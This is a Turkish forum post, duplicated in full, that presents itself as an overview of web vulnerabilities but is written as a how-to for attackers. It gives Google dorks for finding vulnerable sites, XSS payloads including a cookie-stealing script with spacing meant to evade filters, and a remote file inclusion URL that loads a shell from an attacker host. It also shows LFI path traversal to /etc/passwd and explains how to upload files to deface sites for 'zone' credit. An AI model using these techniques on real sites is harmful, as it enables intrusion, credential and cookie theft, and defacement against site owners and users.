⭐ Web Güvenlik Açıkları Nelerdir? ⭐
Gönderilme zamanı: 11 Tem 2020, 10:33
Web Güvenliği Nedir?
Web Güvenliği sizin emek verdiğiniz bir projeyi ve ya çalışmayı ele geçirmek zarar vermek isteyen kötü yazılımlı korsanlara karşı alınan geniş çaplı güvenlik önlemleridir. Bu tür güvenlik önlemlerinde en ufak hata belirtisi bile korsanlar için büyük bir umut sizin için de kötü bir sonuç doğurabilir. Peki Web açıkları nelerdir?
SQL Açığı Nedir?
Günümüzde en çok olan açıktır. SQL web sitenin veritabanıdır. SQL açığı sayesinde bir web sitede ki tüm kullanıcıları alıp ister silip isterse bir şeyler ekleyebilirsiniz. Root pass alıp web sitenin admin paneline ulaşılabilir bu açık ile
SQL Açığı Dorkları
SQL açıklı siteleri bulmak için ve ya sitenin sql açığı bulmak için mesela index.php?id=3 bunu sitenin sonuna girerseniz ve hata verirse web sitesinde SQL açığı var demektir SQL Açık Dorkları ;
Kod:
inurl:index.php?id=
Bu dorkları yazıp id değerlerini girerseniz ve hata verirse SQL açığı demektir bu açıktan faydalanıp web sitenin tüm bilgilerini ele geçirebilirsiniz.
XSS (Cross Site Scripting) Açığı Nedir?
Günümüzde büyük firmalarda bile bulunan önemli ama bir o kadar da eski bir açıktır. Açığın bulunması kolaydır.
Peki bu açıkla ne yapabilirim? Bu açık kullanıcılar siteye kayıt ve ya giriş yapınca hesap bilgileri cookieslere kaydolunur ve bu açık ile cookiesleri çekip hatta admin hesabını da çekip siteye büyük bir zarar verebilirsiniz. Bu açık manuel şekilde bulunur ve bulunması ile kapatılması çok kolaydır. XSS açığı arama , galeri , kayıt , giriş , mesajlar , haberler ve yorumlar kısımlarında enjekte edip bulabilirsiniz. Peki XSS açığı manuel olarak bulma kodu nedir?
PHP için XSS açık kodu ;
< script>alert("THTBANJAMEN")</script>
Örnek ; http://www.hedefsite.com/arama.php?=< script>alert("THTBANJAMEN")</script>
ASP için XSS açık kodu ;
">< script>alert("THTBANJAMEN")</script>
Örnek ; http://www.hedefsite.com/arama.asp?=">< script>alert("THTBANJAMEN")</script>
Cookiesleri çekmek için kod ;
< script>alert (d o c u m e n t.cookie);</script>
Not = "d o c u m e n t" arasında boşluk olmayacak şekilde yazınız
XSS Açığı Bulma Dorkları
Kod:
inurl:search.php?ID=
RFI Açığı Nedir?
Sadece PHP de olan bir açık türüdür nedenini sorarsanız RFI açığını destekleyen kodlar PHP de bulunduğu için sadece orada bulunur. Günümüzde pek yaygın olmayan ve pek fazla karşılaşılmayan bir açık türü olan RFI Remote File Include'nin kısaltılmış halidir. Türkçesi ise Uzaktan dosya çekmektir.
RFI Açığı Örnek ; index2.php dosyası:
include(“$duyurular/guncel/duyuru.php”);
Bu satırdaki “$” işareti bulunan paramtreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
“http://www.hedef.com/index2.php?duyu...om/shell.txt?”
Yukarıdaki şekilde, http://saldirgan.com/shell.txt? adresinde bulunan zararlı kodlar www.hedef.com adresi üzerinde çalıştırılacaktır.
Bu aşamadan sonra shell sayesinde web siteye sızan kötü amaçlı korsan istediğini yapabilir bu aşamada genellikle en çok R57 , C99 shelleri kullanılır.
LFI Açığı Nedir?
Açılımı Local File İnclude dir siteye uzaktan dosya ekleme demektir Türkçe anlamı. LFI açığı ile bir siteye shell yükleyebilir ve ya root bilgilerini alabilirsiniz. Peki nasıl root bilgilerini alacağım? Öncelikle Mozilla Firefox'un yüklü olması lazım günümüzde fazla olmayan neredeyse bulunması imkansız gibi olan LFI açığı yakın zamanda tarihe karışabilir.
2 - Tamper Data Eklentisini yükleyelim.
Daha sonra bir LFI açığı dorkunu google yazıp bir siteye tıklıyoruz. Dorklar SQL açığı dorklarının aynısı olabilir ondan dolayı id numarasını silip yerine ../../../../../../etc/passwd
yazarsanız sitede ki rootun hesap bilgileri sizin elinize geçer.
Upload Açığı Nedir?
Upload açığı günümüzde zone kaydı kasmak için kullanılan çok basit bir açıktır. Web siteye zarar vermeyen bu açık attığınız html dosyasını sitenin dosyalarında bir yerde kaydeder ve bu linki alıp zone kaydı alıp zone kasabilirsiniz. Yapmanız gereken Google a upload açığı dorku yazarak çıkan yere html dosyanızı atıp upload butonuna tıklayıp dosyanın olduğu adrese gitmek.
Upload Açığı Dorkları
Kod:
inurl: uploadbutton.html
Bunlar örnek olarak ve en çok kaynak çıkan dorklardır tabii daha fazla dork vardır.
Örnek olarak ;
1 - Siteye girdikten sonra şu şekil bir ekran çıkıcaktır upload butonuna tıkladıktan sonra html dosyanızı atın ve çıkan linki alıp zone kaydı alın.
Not = Forumda upload açığı ile zone kasmak yasak belirtiyim!
Konu bu kadar iyi forumlar...
Web Güvenliği sizin emek verdiğiniz bir projeyi ve ya çalışmayı ele geçirmek zarar vermek isteyen kötü yazılımlı korsanlara karşı alınan geniş çaplı güvenlik önlemleridir. Bu tür güvenlik önlemlerinde en ufak hata belirtisi bile korsanlar için büyük bir umut sizin için de kötü bir sonuç doğurabilir. Peki Web açıkları nelerdir?
SQL Açığı Nedir?
Günümüzde en çok olan açıktır. SQL web sitenin veritabanıdır. SQL açığı sayesinde bir web sitede ki tüm kullanıcıları alıp ister silip isterse bir şeyler ekleyebilirsiniz. Root pass alıp web sitenin admin paneline ulaşılabilir bu açık ile
SQL Açığı Dorkları
SQL açıklı siteleri bulmak için ve ya sitenin sql açığı bulmak için mesela index.php?id=3 bunu sitenin sonuna girerseniz ve hata verirse web sitesinde SQL açığı var demektir SQL Açık Dorkları ;
Kod:
inurl:index.php?id=
Bu dorkları yazıp id değerlerini girerseniz ve hata verirse SQL açığı demektir bu açıktan faydalanıp web sitenin tüm bilgilerini ele geçirebilirsiniz.
XSS (Cross Site Scripting) Açığı Nedir?
Günümüzde büyük firmalarda bile bulunan önemli ama bir o kadar da eski bir açıktır. Açığın bulunması kolaydır.
Peki bu açıkla ne yapabilirim? Bu açık kullanıcılar siteye kayıt ve ya giriş yapınca hesap bilgileri cookieslere kaydolunur ve bu açık ile cookiesleri çekip hatta admin hesabını da çekip siteye büyük bir zarar verebilirsiniz. Bu açık manuel şekilde bulunur ve bulunması ile kapatılması çok kolaydır. XSS açığı arama , galeri , kayıt , giriş , mesajlar , haberler ve yorumlar kısımlarında enjekte edip bulabilirsiniz. Peki XSS açığı manuel olarak bulma kodu nedir?
PHP için XSS açık kodu ;
< script>alert("THTBANJAMEN")</script>
Örnek ; http://www.hedefsite.com/arama.php?=< script>alert("THTBANJAMEN")</script>
ASP için XSS açık kodu ;
">< script>alert("THTBANJAMEN")</script>
Örnek ; http://www.hedefsite.com/arama.asp?=">< script>alert("THTBANJAMEN")</script>
Cookiesleri çekmek için kod ;
< script>alert (d o c u m e n t.cookie);</script>
Not = "d o c u m e n t" arasında boşluk olmayacak şekilde yazınız
XSS Açığı Bulma Dorkları
Kod:
inurl:search.php?ID=
RFI Açığı Nedir?
Sadece PHP de olan bir açık türüdür nedenini sorarsanız RFI açığını destekleyen kodlar PHP de bulunduğu için sadece orada bulunur. Günümüzde pek yaygın olmayan ve pek fazla karşılaşılmayan bir açık türü olan RFI Remote File Include'nin kısaltılmış halidir. Türkçesi ise Uzaktan dosya çekmektir.
RFI Açığı Örnek ; index2.php dosyası:
include(“$duyurular/guncel/duyuru.php”);
Bu satırdaki “$” işareti bulunan paramtreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
“http://www.hedef.com/index2.php?duyu...om/shell.txt?”
Yukarıdaki şekilde, http://saldirgan.com/shell.txt? adresinde bulunan zararlı kodlar www.hedef.com adresi üzerinde çalıştırılacaktır.
Bu aşamadan sonra shell sayesinde web siteye sızan kötü amaçlı korsan istediğini yapabilir bu aşamada genellikle en çok R57 , C99 shelleri kullanılır.
LFI Açığı Nedir?
Açılımı Local File İnclude dir siteye uzaktan dosya ekleme demektir Türkçe anlamı. LFI açığı ile bir siteye shell yükleyebilir ve ya root bilgilerini alabilirsiniz. Peki nasıl root bilgilerini alacağım? Öncelikle Mozilla Firefox'un yüklü olması lazım günümüzde fazla olmayan neredeyse bulunması imkansız gibi olan LFI açığı yakın zamanda tarihe karışabilir.
2 - Tamper Data Eklentisini yükleyelim.
Daha sonra bir LFI açığı dorkunu google yazıp bir siteye tıklıyoruz. Dorklar SQL açığı dorklarının aynısı olabilir ondan dolayı id numarasını silip yerine ../../../../../../etc/passwd
yazarsanız sitede ki rootun hesap bilgileri sizin elinize geçer.
Upload Açığı Nedir?
Upload açığı günümüzde zone kaydı kasmak için kullanılan çok basit bir açıktır. Web siteye zarar vermeyen bu açık attığınız html dosyasını sitenin dosyalarında bir yerde kaydeder ve bu linki alıp zone kaydı alıp zone kasabilirsiniz. Yapmanız gereken Google a upload açığı dorku yazarak çıkan yere html dosyanızı atıp upload butonuna tıklayıp dosyanın olduğu adrese gitmek.
Upload Açığı Dorkları
Kod:
inurl: uploadbutton.html
Bunlar örnek olarak ve en çok kaynak çıkan dorklardır tabii daha fazla dork vardır.
Örnek olarak ;
1 - Siteye girdikten sonra şu şekil bir ekran çıkıcaktır upload butonuna tıkladıktan sonra html dosyanızı atın ve çıkan linki alıp zone kaydı alın.
Not = Forumda upload açığı ile zone kasmak yasak belirtiyim!
Konu bu kadar iyi forumlar...